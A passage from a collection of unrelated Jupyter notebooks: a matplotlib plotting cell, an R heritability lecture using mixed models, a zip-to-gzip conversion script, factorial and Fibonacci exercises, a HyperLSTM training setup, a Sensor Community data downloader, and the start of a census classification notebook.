        alpha=alpha, markersize=7,
        #markerfacecolor="none",
        ls=ls,
    )
ax.set_xscale("log")
ax.set_xticks([4, 16, 64, 256, 1024])
ax.set_xticklabels([4, 16, 64, 256, 1024])
#ax.set_ylim([0, 1])
ax.spines["right"].set_visible(False)
ax.legend()
ax.set_xlim([2, 2048])
# ax2.set_xscale('log')
ax2.set_xticks([4096])
ax2.set_xticklabels(["full"])
ax2.spines["left"].set_visible(False)
ax2.yaxis.tick_right()
d = 0.015  # how big to make the diagonal lines in axes coordinates
# arguments to pass plot, just so we don't keep repeating them
kwargs = dict(transform=ax.transAxes, color="k", clip_on=False)
ax.plot((1 - d, 1 + d), (-d, +d), **kwargs)
ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs)
d = 0.015
offset = 5
kwargs.update(transform=ax2.transAxes)  # switch to the bottom axes
ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs)
ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs)
ax.minorticks_on()
ax.tick_params(axis="y", which="minor", direction="out")
if False:
    ax.grid(axis="y", which="major", linestyle="-", alpha=0.5)
    ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
    ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5)
    ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
if False:
    ax.set_ylim([5e-2, 1])
    ax2.set_yscale('log')
ax.set_title(dataset.upper(), x=0.605)
ax.set_ylabel('Classification Acc.')
ax.set_xlabel('# Training Examples', x=0.605)
color_list = [
    {
        "mask": results_df.augmented == 'not_augmented',
        "color": pal[16],
        "ls": 'solid',
        "marker": 'o',
        "label": "Baseline"
    },
    {
        "mask": results_df.augmented == 'umap_over_z',
        "color": pal[8],
        "ls": 'dashed',
        "marker": 'X',
        "label": "UMAP (learned z)"
    },
    #{
    #    "mask": results_df.augmented == 'umap_learned',
    #    "color": pal[4],
    #    "ls": 'solid',
    #    "marker": 'o',
    #    "label": "+ UMAP (learned)"
    #},
]
alpha = 0.75
linewidth = 2
fig, (ax, ax2) = plt.subplots(
    1, 2, figsize=(5, 3), dpi=100, sharey=True,
    gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05},
)
for li, col_dict in enumerate(color_list):
    mask = col_dict["mask"]
    color = col_dict['color']
    ls = col_dict['ls']
    label = col_dict['label']
    marker = col_dict['marker']
    subset_ds = results_df[mask]
    subset_ds = subset_ds[subset_ds.dset_size_title != "full"]
    nex = subset_ds.labels_per_class.values.astype("int")
    acc = subset_ds.test_acc.values
    ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
    ax.plot(nex, acc,
linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label subset_ds = results_df[mask] subset_ds = subset_ds[subset_ds.dset_size_title == "full"] #display(subset_ds) nex = subset_ds.labels_per_class.values.astype("int") acc = subset_ds.test_acc.values nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025 ax2.scatter(nex, acc, ls=ls, color=color, s=50, alpha=1, marker=marker)#, facecolors="none") ax.plot( [], [], "-" + marker, color=color, linewidth=linewidth, label=label, alpha=alpha, markersize=7, #markerfacecolor="none", ls=ls, ) ax.set_xscale("log") ax.set_xticks([4, 16, 64, 256, 1024]) ax.set_xticklabels([4, 16, 64, 256, 1024]) #ax.set_ylim([0, 1]) ax.spines["right"].set_visible(False) ax.legend() ax.set_xlim([2, 2048]) # ax2.set_xscale('log') ax2.set_xticks([4096]) ax2.set_xticklabels(["full"]) ax2.spines["left"].set_visible(False) ax2.yaxis.tick_right() d = 0.015 # how big to make the diagonal lines in axes coordinates # arguments to pass plot, just so we don't keep repeating them kwargs = dict(transform=ax.transAxes, color="k", clip_on=False) ax.plot((1 - d, 1 + d), (-d, +d), **kwargs) ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs) d = 0.015 offset = 5 kwargs.update(transform=ax2.transAxes) # switch to the bottom axes ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs) ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs) ax.minorticks_on() ax.tick_params(axis="y", which="minor", direction="out") if False: ax.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5) ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5) if False: ax.set_ylim([5e-2, 1]) ax2.set_yscale('log') ax.set_title(dataset.upper(), x=0.605) ax.set_ylabel('Classification Acc.') ax.set_xlabel('# Training Examples', x=0.605) ###Output _____no_output_____
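###Markdown The plot blocks above differ only in their `color_list` (and, in the first block, in plotting error rather than accuracy), so the repetition can be factored out. A helper sketch (assuming the `results_df` columns used throughout this notebook): ###Code
def plot_comparison(results_df, color_list, title, alpha=0.75, linewidth=2):
    """Broken-axis accuracy plot mirroring the inline blocks above."""
    fig, (ax, ax2) = plt.subplots(1, 2, figsize=(5, 3), dpi=100, sharey=True,
                                  gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05})
    for li, cd in enumerate(color_list):
        sub = results_df[cd["mask"]]
        small = sub[sub.dset_size_title != "full"]
        nex = small.labels_per_class.values.astype("int")
        ax.scatter(nex, small.test_acc.values, color=cd["color"], s=50, marker=cd["marker"])
        ax.plot(nex, small.test_acc.values, linewidth=linewidth, alpha=alpha,
                color=cd["color"], ls=cd["ls"], label=cd["label"])
        full = sub[sub.dset_size_title == "full"]
        ax2.scatter(full.labels_per_class.values.astype("int") + li / 100,
                    full.test_acc.values, color=cd["color"], s=50, marker=cd["marker"])
    ax.set_xscale("log")
    ax.legend()
    ax.set_title(title)
    ax.set_ylabel('Classification Acc.')
    ax.set_xlabel('# Training Examples')
    return fig
###Output
_____no_output_____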
gwas-lecture-master/Lecture-6-BroadSenseHeritability.ipynb
###Markdown Estimating broad-sense heritability ($H^{2}$)
Heritability is the proportion of phenotypic variance that can be attributed to genetic differences among individuals. It is defined as the ratio of genetic to total phenotypic variation in a population:
Phenotype (P) = Genotype (G) + Environment (E)
The genetic component of phenotypic variance can be separated into additive, dominance, and interaction (G x G) effects. Each of these components of variance contributes to broad-sense heritability:
\begin{equation*} H^{2} = \frac{V_G}{V_P} \end{equation*}
or
\begin{equation*} H^{2} = \frac{V_a + V_d + V_i}{V_P} \end{equation*}
There are several ways to estimate broad-sense heritability. For those of us that work on inbred lines, we can model the variance due to genetics and the environment using a mixed-effects model, while including the accession id (also known as the genotype or ecotype in some fields of research) as a random effect. We can then use a trick described in [this paper](https://besjournals.onlinelibrary.wiley.com/doi/10.1111/j.2041-210x.2012.00261.x) and implemented in code described [here](https://jonlefcheck.net/2013/03/13/r2-for-linear-mixed-effects-models/).
*** Load the data
To investigate broad-sense heritability, let's use [publicly available](http://www.pnas.org/content/112/13/4032) glucosinolate data. The formatted data can be downloaded here:
curl https://raw.githubusercontent.com/timeu/gwas-lecture/master/data/cmeyer_glucs2015/bmeyer_etal.txt --create-dirs --output data/cmeyer_glucs2015/bmeyer_etal.txt
This is the R script for estimating marginal and conditional variance in a mixed model (merMod):
curl https://raw.githubusercontent.com/timeu/gwas-lecture/master/data/cmeyer_glucs2015/hdr.estimate_r2_mixedmodels.R --create-dirs --output data/cmeyer_glucs2015/hdr.estimate_r2_mixedmodels.R ###Code
## if lme4 isn't installed, install it first:
if (!require("lme4")) install.packages("lme4");
library(lme4);
source("data/cmeyer_glucs2015/hdr.estimate_r2_mixedmodels.R");

glucosinolateFileName <- "data/cmeyer_glucs2015/bmeyer_etal.txt";
glucs <- read.table(glucosinolateFileName, header=T, sep="\t", as.is=T, stringsAsFactors=FALSE);
glucs <- glucs[order(glucs[,"accession_id"]),];
dim(glucs);
head(glucs);
str(glucs); ## note that accession_id isn't a factor yet...

## it is numeric, so it is important to be explicit...
glucs$accession_id <- as.factor(glucs$accession_id);

## adjust the ion counts by sample weight
for( j in 3:ncol(glucs)){
    glucosinolateVariableName <- colnames(glucs)[j];
    glucs[[paste0(glucosinolateVariableName, "_per_mg")]] <- glucs[,glucosinolateVariableName] / glucs[,"sample_weight"]; ## in mg
}

## there are 22 glucosinolate phenotypes, let's look at their distributions
options(repr.plot.width=5, repr.plot.height=4)
scaledGlucosinolates <- colnames(glucs)[grep("per_mg$", colnames(glucs))];
for( col_j in scaledGlucosinolates ){
    scaledGluc_j <- glucs[,col_j];
    hist(scaledGluc_j, breaks=100, col="cadetblue3", main=col_j, xlab=paste0("Ion counts, ", col_j));
}
###Output
_____no_output_____
###Markdown There's a surprising amount of zero-inflation in the data.
To analyze data such as these, one can choose between (a) a zero-inflated model, (b) logistic regression (focusing on presence/absence of each metabolite), (c) attempting to standardize the data and analyze it using traditional linear approaches (not recommended but the most common approach; linear models are very robust), (d) analyzing the data as presence/absence data and, separately, abundance data before combining the results using Brown's _P_ value or a weighted Z-score approach. Let's use linear models to investigate the data, which is what the authors did ###Code results <- data.frame(method=character(), glucosinolate_name=character(), H2=numeric(), pvalue=numeric(), stringsAsFactors=FALSE); scaledGlucosinolates <- colnames(glucs)[grep("per_mg$", colnames(glucs))]; print(scaledGlucosinolates); for( col_j in scaledGlucosinolates ){ cat("Investigating:", col_j, "\n"); log_of_y <- log(glucs[,col_j] + 0.01); ## add an offset to avoid 0s which return -Inf lm.null <- lm(log_of_y ~ 1, data=glucs); lmer.alt <- lmer(log_of_y ~ 1 + (1|accession_id), data=glucs, REML=FALSE); results[nrow(results) + 1, "method"] <- "linear"; results[nrow(results), "glucosinolate_name"] <- col_j; ourEstimate <- r.squared.merMod(lmer.alt); results[nrow(results), "H2"] <- ourEstimate['Conditional'] - ourEstimate['Marginal']; ## note that the mixed model has to be specified first ## if sigma is on the boundary, this approach is conservative; consider exactLRT which estimates the p-value using simulations. ## source: https://bbolker.github.io/mixedmodels-misc/glmmFAQ.html results[nrow(results), "pvalue"] <- anova(lmer.alt, lm.null)[2, "Pr(>Chisq)"]; } results; title <- paste0("Heritability of glucosinolates"); hist(results[,"H2"], breaks=25, col="red", main=title, xlab=expression(paste("H"^"2"))) ###Output _____no_output_____
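###Markdown As a concrete reading of the estimator above (a worked example with hypothetical variance components): the conditional $R^2$ credits both the accession (random) effect and the fixed effects, while the marginal $R^2$ credits only the fixed effects, so their difference isolates the accession share of the phenotypic variance. With accession variance 2, residual variance 2, and no fixed-effect variance:
\begin{equation*}
H^{2} \approx R^{2}_{conditional} - R^{2}_{marginal} = \frac{0 + 2}{0 + 2 + 2} - \frac{0}{0 + 2 + 2} = 0.5
\end{equation*}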
Changing_compression.ipynb
###Markdown Importing Libraries ###Code
from zipfile import ZipFile
import os
import re
import gzip
###Output
_____no_output_____
###Markdown Finding files with .zip extensions in the './data/' directory ###Code
data_folder = "./data/"

# Loading the list of files in the './data/' directory
pattern = r'(.*)\.zip'
files_n = [[par_n + "/", re.match(pattern, file)[1]]
           for par_n, dir_n, file_n in os.walk(data_folder)
           for file in file_n if re.match(pattern, file) is not None]

# Changing the compression to gzip
for path, file in files_n:
    # Extracting the zip file
    with ZipFile(path + file + '.zip', 'r') as zipf:
        zipf.extractall(path)
    # Compressing the extracted text file using gzip compression
    with open(path + file + '.txt', 'rb') as f_in, gzip.open(path + file + '.txt.gz', 'wb') as f_out:
        f_out.writelines(f_in)
    # Removing the extracted text file
    os.remove(path + file + '.txt')
###Output
_____no_output_____
###Markdown Uploading gzipped files ###Code
# For uploading the gzipped files, run the following from the command line
# (assuming all the gzip files are directly inside the ./data/ directory on your local machine):
# gsutil -m cp -r ./data/*.gz gs://my-bucket/directory
###Output
_____no_output_____
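###Markdown A quick verification sketch (assumes the conversion cell above has run): each converted archive should now decompress back to readable text. ###Code
# spot-check the first converted file; files_n comes from the cell above
for path, file in files_n[:1]:
    with gzip.open(path + file + '.txt.gz', 'rt') as f:
        print(f.readline())
###Output
_____no_output_____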
unit1/fibonacci.ipynb
###Markdown
Task: create a function that returns the first n factorials
fact(4) [1, 1, 2, 6, 24] i.e. [0!, 1!, 2!, 3!, 4!]
###Code
import unittest

class TestFact(unittest.TestCase):
    """test factorial functions"""
    def test1(self):
        self.assertEqual(fact(0), [1])
        self.assertEqual(fact(1), [1, 1])
        self.assertEqual(fact(2), [1, 1, 2])
        self.assertEqual(fact(3), [1, 1, 2, 6])
        self.assertEqual(fact(5), [1, 1, 2, 6, 24, 120])
def fact(n):
    res = []
    return res
a=[4,8,9,0]
a[2]
res = [1]
n = 7
for i in range(1, n):
    t = i*res[i-1]
    res.append(t)
res
def fact(n):
    res = [1]
    # the range must run to n+1 so that fact(1) returns [1, 1] as the tests expect
    for i in range(1, n + 1):
        t = i*res[i-1]
        res.append(t)
    return res
fact(5)
###Output
_____no_output_____
###Markdown
Task: create a function that returns the first n terms of the Fibonacci sequence
fib(8) [0, 1, 1, 2, 3, 5, 8, 13] (matching the tests below)
###Code
def fib(n):
    res = [0, 1]
    return res
import unittest

class TestFib(unittest.TestCase):
    """test fibonacci functions"""
    def test1(self):
        self.assertEqual(fib(2), [0, 1])
        self.assertEqual(fib(4), [0, 1, 1, 2])
        self.assertEqual(fib(8), [0, 1, 1, 2, 3, 5, 8, 13])

if __name__ == '__main__':
    unittest.main(argv=['first-arg-is-ignored'], exit=False)
res = [0,1]
n = 7
for i in range(1, n):
    # t = res[i-1]
    t = res[i]+res[i-1]
    res.append(t)
res
def fib(n):
    res = [0,1]
    for i in range(1, n-1):
        t = res[i]+res[i-1]
        res.append(t)
    return res
fib(10)
t = 1
i = 1
n = 13
while i <= n:
    t = i*t
    # print(i,t)
    i = i+1
def fact2(n):
    i = 1
    t = 1
    while i <= n:
        t = i*t
        # print(i,t)
        i = i+1
    return t
fact2(15)
assert fact2(1) == 1
assert fact2(2) == 2
assert fact2(3) == 6
n = int(input("number"))
fact2(n)
def fact_user():
    s = input("number?")
    n = int(s)
    res = fact2(n)
    return res
fact_user()
t = 1
i = 1
while t <= 1e9:
    t = i*t
    print(i,t)
    i = i+1
ss = " AAABBBBCCCCCC"
len(ss)
"E" in ss
ss.count("S")
fact2(len(ss))/(fact2(ss.count("A")) * fact2(ss.count("B")) * fact2(ss.count("C")))
###Output
_____no_output_____
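###Markdown
As a quick cross-check of `fact` and `fact2` (an extra cell using only the standard library; not part of the original exercise):
###Code
import math

# the list version should agree with math.factorial term by term
assert fact(5) == [math.factorial(i) for i in range(6)]
# the while-loop version should agree for a single value
assert fact2(15) == math.factorial(15)
print("cross-checks passed")
###Output
_____no_output_____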
labml_nn/hypernetworks/experiment.ipynb
###Markdown
[![Github](https://img.shields.io/github/stars/labmlai/annotated_deep_learning_paper_implementations?style=social)](https://github.com/labmlai/annotated_deep_learning_paper_implementations)[![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/labmlai/annotated_deep_learning_paper_implementations/blob/master/labml_nn/hypernetworks/experiment.ipynb)
HyperLSTM
This is an experiment training the Tiny Shakespeare dataset with HyperLSTM from the paper HyperNetworks.
###Code
!pip install labml-nn
from labml import experiment
from labml_nn.hypernetworks.experiment import Configs
# Create experiment
experiment.create(name="hyper_lstm", comment='')
# Create configs
conf = Configs()
# Load configurations
experiment.configs(conf,
                   # A dictionary of configurations to override
                   {'tokenizer': 'character',
                    'text': 'tiny_shakespeare',
                    'optimizer.learning_rate': 2.5e-4,
                    'optimizer.optimizer': 'Adam',
                    'prompt': 'It is',
                    'prompt_separator': '',

                    'rnn_model': 'hyper_lstm',

                    'train_loader': 'shuffled_train_loader',
                    'valid_loader': 'shuffled_valid_loader',

                    'seq_len': 512,
                    'epochs': 128,
                    'batch_size': 2,
                    'inner_iterations': 25})

# Set models for saving and loading
experiment.add_pytorch_models({'model': conf.model})
conf.init()
# Start the experiment
with experiment.start():
    # `TrainValidConfigs.run`
    conf.run()
###Output
_____no_output_____
notebooks/download_sensor_community.ipynb
###Markdown
Automated .csv download
Automated download of sensor data from [Sensor Community Archive](https://archive.sensor.community/csv_per_month/).

Define `MONTH_START`, `MONTH_COUNT` and `SENSORS` to specify the files that should be downloaded.

Define `WAIT_BETWEEN_DOWNLOADS` to set the waiting time in minutes between when one download finishes and the next begins. A random integer number of minutes between the two values defined (upper bound exclusive) will be used.

Define `LAT_RANGE` and `LON_RANGE` for the geographical regions of interest.
###Code
import requests
from bs4 import BeautifulSoup as bs
import time
import os
import zipfile
import numpy as np
import pandas as pd
MONTH_START = "2020-01" # Start month in the format yyyy-mm
MONTH_COUNT = 1 # sensor data will be downloaded for this many months
URL = "https://archive.sensor.community/csv_per_month/"
ROOT_DIR = os.path.join(os.curdir, "../data", "")
WAIT_BETWEEN_DOWNLOADS = (0, 1)
SENSORS = [
    'bme280',
#     'bmp180',
    'bmp280',
    'dht22',
#     'ds18b20',
#     'hpm',
#     'htu21d',
#     'pms1003',
#     'pms3003',
#     'pms5003',
#     'pms6003',
#     'pms7003',
#     'ppd42ns',
    'sds011',
]
LAT_RANGE = [
    (53.013, 53.1456),
    (50.030681, 50.205692),
]
# Bremen: (53.013, 53.1456)
# Frankfurt a. M.: (50.030681, 50.205692)
LON_RANGE = [
    (8.67, 8.9334),
    (8.430634, 8.919868),
]
# Bremen: (8.67, 8.9334)
# Frankfurt a. M.: (8.430634, 8.919868)
def write_to_log(log_file, *args):
    """writes text to the defined log file

    Args:
        log_file: path to the log file
        *args: one or more strings that are written to the log file
    """
    with open(log_file, 'a') as log:
        for text in args:
            log.write(text)
script_start = time.time()

# make log file if it doesn't exist
date = time.strftime('%Y_%m_%d')
log_file_name = date + "_download_log.txt"
log_file_dir = os.path.join(ROOT_DIR, log_file_name)
print(log_file_dir)

if not os.path.exists(ROOT_DIR):
    os.mkdir(ROOT_DIR)

if os.path.isfile(log_file_dir):
    print('log file already exists.')
    print('New entries will be appended.')
else:
    log = open(log_file_dir, "w")
    log.close()

write_to_log(log_file_dir, "Session started at " + time.strftime('%Y_%m_%d-%H_%M_%S') + '\n')

# make list of relevant months
month_current = MONTH_START
months = [MONTH_START]
for month in range(MONTH_COUNT-1):
    y, m = month_current.split('-')
    if m == '12':
        m = '01'
        y = str(int(y) + 1)
    elif int(m) < 9:
        m = '0' + str(int(m) + 1)
    else:
        m = str(int(m) + 1)
    month_current = y + '-' + m
    months.append(month_current)

write_to_log(log_file_dir, f"Months: {months}\n")

# get download links for relevant months and sensors
for month in months:
    # get url
    url_curr = URL + month + '/'
    print(url_curr)
    write_to_log(log_file_dir, f"URL: {url_curr}\n")

    # find download links according to the sensors list and save them with file names
    r = requests.get(url_curr)
    soup = bs(r.text, "html.parser")
    urls = []
    names = []
    for i, link in enumerate(soup.findAll('a')):
        if '.zip' in str(link) and any([sensor in str(link) for sensor in SENSORS]):
            url_download = url_curr + link.get('href')
            urls.append(url_download)
            names.append(soup.select('a')[i].attrs['href'])
    print("Files to download:")
    for file_name in names:
        print(file_name)
    write_to_log(log_file_dir, f"\tFiles: {names}\n")
    names_urls = zip(names, urls)

    # download files
    files_finished = 0
    for name, url in names_urls:
        # define path where downloaded file will be saved
        category = name.split('.')[0].split('_')[-1]
        # directory = os.path.join(ROOT_DIR, category, "")
        directory = ROOT_DIR
        full_path = os.path.join(directory, name)
        if not os.path.exists(directory):
            os.mkdir(directory)

        # define path for processed .csv file
        processed_dir =
os.path.join(ROOT_DIR, "SensorCommunity", "") if not os.path.exists(processed_dir): os.mkdir(processed_dir) name_csv = name.split('.')[0] + ".csv" csv_processed_dir = os.path.join(processed_dir, name_csv) # get path of unprocessed .csv file csv_full = os.path.join(directory, name_csv) # if the processed .csv file already exists skip download if os.path.isfile(csv_processed_dir) or os.path.isfile(csv_full) or os.path.isfile(full_path): if os.path.isfile(csv_processed_dir): write_to_log(log_file_dir, \ f"\t\t{csv_processed_dir} already exists... download and processing {name} gets skipped.\n") continue elif os.path.isfile(csv_full): write_to_log(log_file_dir, \ f"\t\t{csv_full} already exists... download of {name} gets skipped.\n") elif os.path.isfile(full_path): write_to_log(log_file_dir, \ f"\t\t{full_path} already exists... download of {name} gets skipped.\n") # download .zip file if it doesn't exist yet if not os.path.isfile(csv_full) and not os.path.isfile(full_path): print(f"Start downloading {name}.") start = time.time() response = requests.get(url, timeout=50) with open(full_path, 'wb') as f: f.write(response.content) end = time.time() print(f"The download took {round((end - start) / 60, 1)} minutes.") write_to_log(log_file_dir, \ f"\t\t{name}\n", \ f"\t\t\tDownload successfully finished after {(end - start) / 60} minutes.\n") if os.path.isfile(full_path): # unzip file print("Unzip file...") with zipfile.ZipFile(full_path, 'r') as zip_ref: zip_ref.extractall(directory) print("Unzipping finished") write_to_log(log_file_dir, f"\t\t\t{name} unzipped\n") # delete .zip os.remove(full_path) print(".zip file deleted") write_to_log(log_file_dir, f"\t\t\t.zip file deleted\n") # define the chunk size that is read from .csv chunksize = 10 ** 6 # read .csv chunkwise with pd.read_csv(csv_full, sep=";", chunksize=chunksize) as reader: write_to_log(log_file_dir, f"\t\t\tprocessing {csv_full}\n") print(f"processing {csv_full}\n") for i, chunk in enumerate(reader): # filter data by desired longitude and latitude for j, lat in enumerate(LAT_RANGE): df_temp = chunk[(chunk['lat'] > LAT_RANGE[j][0]) & \ (chunk['lat'] < LAT_RANGE[j][1]) & \ (chunk['lon'] > LON_RANGE[j][0]) & \ (chunk['lon'] < LON_RANGE[j][1])] # make a new file for the first chunk and append the subsequent chunks if not i and not j: df_temp.to_csv(csv_processed_dir, header=True, index=False) else: df_temp.to_csv(csv_processed_dir, mode='a', header=False, index=False) write_to_log(log_file_dir, f"\t\t\t\twrote chunk #{i} for region #{j}\n") #delete original .csv file os.remove(csv_full) write_to_log(log_file_dir, f"\t\t\t\t{csv_full} deleted\n") print(f"{csv_full} deleted") # wait before next download starts wait = np.random.randint(WAIT_BETWEEN_DOWNLOADS[0], WAIT_BETWEEN_DOWNLOADS[1]) print(f"Wait for {wait} minutes") write_to_log(log_file_dir, f"\t\t\twait for {wait} minutes\n\n") time.sleep(wait * 60) print() script_end = time.time() print(f"Finished script after {round((script_end - script_start) / 60, 1)} minutes") write_to_log(log_file_dir, f"Finished script after {round((script_end - script_start) / 60, 1)} minutes\n\n") ###Output _____no_output_____
AppModel.ipynb
###Markdown ###Code !pip install eli5 !pip install xgboost !pip install category_encoders !pip install shap ###Output Requirement already satisfied: eli5 in /usr/local/lib/python3.6/dist-packages (0.10.1) Requirement already satisfied: six in /usr/local/lib/python3.6/dist-packages (from eli5) (1.15.0) Requirement already satisfied: scikit-learn>=0.18 in /usr/local/lib/python3.6/dist-packages (from eli5) (0.22.2.post1) Requirement already satisfied: attrs>16.0.0 in /usr/local/lib/python3.6/dist-packages (from eli5) (20.2.0) Requirement already satisfied: graphviz in /usr/local/lib/python3.6/dist-packages (from eli5) (0.10.1) Requirement already satisfied: tabulate>=0.7.7 in /usr/local/lib/python3.6/dist-packages (from eli5) (0.8.7) Requirement already satisfied: scipy in /usr/local/lib/python3.6/dist-packages (from eli5) (1.4.1) Requirement already satisfied: numpy>=1.9.0 in /usr/local/lib/python3.6/dist-packages (from eli5) (1.18.5) Requirement already satisfied: jinja2 in /usr/local/lib/python3.6/dist-packages (from eli5) (2.11.2) Requirement already satisfied: joblib>=0.11 in /usr/local/lib/python3.6/dist-packages (from scikit-learn>=0.18->eli5) (0.16.0) Requirement already satisfied: MarkupSafe>=0.23 in /usr/local/lib/python3.6/dist-packages (from jinja2->eli5) (1.1.1) Requirement already satisfied: xgboost in /usr/local/lib/python3.6/dist-packages (0.90) Requirement already satisfied: scipy in /usr/local/lib/python3.6/dist-packages (from xgboost) (1.4.1) Requirement already satisfied: numpy in /usr/local/lib/python3.6/dist-packages (from xgboost) (1.18.5) Requirement already satisfied: category_encoders in /usr/local/lib/python3.6/dist-packages (2.2.2) Requirement already satisfied: statsmodels>=0.9.0 in /usr/local/lib/python3.6/dist-packages (from category_encoders) (0.10.2) Requirement already satisfied: scipy>=1.0.0 in /usr/local/lib/python3.6/dist-packages (from category_encoders) (1.4.1) Requirement already satisfied: pandas>=0.21.1 in /usr/local/lib/python3.6/dist-packages (from category_encoders) (1.1.2) Requirement already satisfied: patsy>=0.5.1 in /usr/local/lib/python3.6/dist-packages (from category_encoders) (0.5.1) Requirement already satisfied: numpy>=1.14.0 in /usr/local/lib/python3.6/dist-packages (from category_encoders) (1.18.5) Requirement already satisfied: scikit-learn>=0.20.0 in /usr/local/lib/python3.6/dist-packages (from category_encoders) (0.22.2.post1) Requirement already satisfied: python-dateutil>=2.7.3 in /usr/local/lib/python3.6/dist-packages (from pandas>=0.21.1->category_encoders) (2.8.1) Requirement already satisfied: pytz>=2017.2 in /usr/local/lib/python3.6/dist-packages (from pandas>=0.21.1->category_encoders) (2018.9) Requirement already satisfied: six in /usr/local/lib/python3.6/dist-packages (from patsy>=0.5.1->category_encoders) (1.15.0) Requirement already satisfied: joblib>=0.11 in /usr/local/lib/python3.6/dist-packages (from scikit-learn>=0.20.0->category_encoders) (0.16.0) Collecting shap [?25l Downloading https://files.pythonhosted.org/packages/d2/17/37ee6c79cafbd9bb7423b54e55ea90beec66aa7638664d607bcc28de0bae/shap-0.36.0.tar.gz (319kB)  |████████████████████████████████| 327kB 5.5MB/s [?25hRequirement already satisfied: numpy in /usr/local/lib/python3.6/dist-packages (from shap) (1.18.5) Requirement already satisfied: scipy in /usr/local/lib/python3.6/dist-packages (from shap) (1.4.1) Requirement already satisfied: scikit-learn in /usr/local/lib/python3.6/dist-packages (from shap) (0.22.2.post1) Requirement already satisfied: pandas in 
/usr/local/lib/python3.6/dist-packages (from shap) (1.1.2) Requirement already satisfied: tqdm>4.25.0 in /usr/local/lib/python3.6/dist-packages (from shap) (4.41.1) Collecting slicer Downloading https://files.pythonhosted.org/packages/46/cf/f37ac7f61214ed044b0df91252ab19376de5587926c5b572f060eb7bf257/slicer-0.0.4-py3-none-any.whl Requirement already satisfied: numba in /usr/local/lib/python3.6/dist-packages (from shap) (0.48.0) Requirement already satisfied: joblib>=0.11 in /usr/local/lib/python3.6/dist-packages (from scikit-learn->shap) (0.16.0) Requirement already satisfied: python-dateutil>=2.7.3 in /usr/local/lib/python3.6/dist-packages (from pandas->shap) (2.8.1) Requirement already satisfied: pytz>=2017.2 in /usr/local/lib/python3.6/dist-packages (from pandas->shap) (2018.9) Requirement already satisfied: setuptools in /usr/local/lib/python3.6/dist-packages (from numba->shap) (50.3.0) Requirement already satisfied: llvmlite<0.32.0,>=0.31.0dev0 in /usr/local/lib/python3.6/dist-packages (from numba->shap) (0.31.0) Requirement already satisfied: six>=1.5 in /usr/local/lib/python3.6/dist-packages (from python-dateutil>=2.7.3->pandas->shap) (1.15.0) Building wheels for collected packages: shap Building wheel for shap (setup.py) ... [?25l[?25hdone Created wheel for shap: filename=shap-0.36.0-cp36-cp36m-linux_x86_64.whl size=456467 sha256=a5869ed98d3fe9b30fc0873d73389f9de87c0bde8717a1d76b9f0d9158992d09 Stored in directory: /root/.cache/pip/wheels/fb/15/e1/8f61106790da27e0765aaa6e664550ca2c50ea339099e799f4 Successfully built shap Installing collected packages: slicer, shap Successfully installed shap-0.36.0 slicer-0.0.4 ###Markdown Import of Libraries needed ###Code import pandas as pd import numpy as np import shap from sklearn.metrics import accuracy_score from sklearn.model_selection import train_test_split from sklearn.pipeline import make_pipeline from sklearn.ensemble import RandomForestClassifier from sklearn.impute import SimpleImputer from category_encoders import OrdinalEncoder from xgboost import XGBClassifier from sklearn.inspection import permutation_importance from sklearn.model_selection import RandomizedSearchCV, GridSearchCV from sklearn.metrics import classification_report, plot_confusion_matrix, plot_roc_curve import matplotlib.pyplot as plt from sklearn.model_selection import GridSearchCV from sklearn.model_selection import cross_val_score ###Output _____no_output_____ ###Markdown Import Datasets ###Code census = pd.read_csv('https://raw.githubusercontent.com/VPDeb/DS-Unit-2-Applied-Modeling/master/Build%20Week%20Project/census.csv') ###Output _____no_output_____ ###Markdown Begin EDA ###Code #Time to make the 'missing' values into NaN so we can work with them census.replace({'?': np.NaN}, inplace=True) #Printing Top Values to Fill NaNs print('Top Value:',census['native-country'].describe()) print('Top Value:',census['occupation'].describe()) print('Top Value:',census['workclass'].describe()) #filling NaN values census['workclass'].replace({np.NaN : 'Private'},inplace=True) census['occupation'].replace({np.NaN : 'Prof-specialty'}, inplace=True) census['native-country'].replace({np.NaN : 'United-States'},inplace=True) ###Output _____no_output_____ ###Markdown Working on the wrangle function. Not sure how to get these three def/if/else functions wrapped into one working or multi working function inside of a wranglefunction🤔 ###Code #Create a New Feature that changes the income column into a 1 if they make more than 50K a year and 0 if they make 50K or less. 
New Feature called 'makes-50K+'.
def over50K(census):
    if census['income'] == '>50K':
        val = 1
    else:
        val = 0
    return val

census['makes-50K+'] = census.apply(over50K, axis=1)

#Create a New Feature that changes the hours worked per week column into a 1 if they worked more than 40 hrs a week and 0 if they worked 40 or less. New Feature called 'over40hrs'.
def over40(census):
    if census['hours-per-week'] >40:
        val = 1
    else:
        val = 0
    return val

census['over40hrs+'] = census.apply(over40, axis=1)

#Create a New Feature that changes the sex column into a 1 if they were Female and 0 if they were Male. New Feature called 'gender-F/1-M/0'. This is the new target column.
def gender(census):
    if census['sex'] == 'Female':
        val = 1
    else:
        val = 0
    return val

census['gender-F/1-M/0'] = census.apply(gender, axis=1)

# Time to drop columns we don't need any longer. 'fnlwgt' is high-cardinality and unnecessary, 'sex' would now become a leaky feature, and income and hours-per-week are now redundant
census = census.drop(columns=['fnlwgt','income','hours-per-week','sex','capital-gain','capital-loss'])
###Output
_____no_output_____
###Markdown
Splitting the Data
###Code
#Split data randomly with a 60/20/20 split
train, val, test = np.split(census.sample(frac=1), [int(.6*len(census)), int(.8*len(census))])

#Split the data into X and y for training the model and making predictions
target= 'gender-F/1-M/0'

y_train = train[target]
X_train = train.drop(target,axis=1)

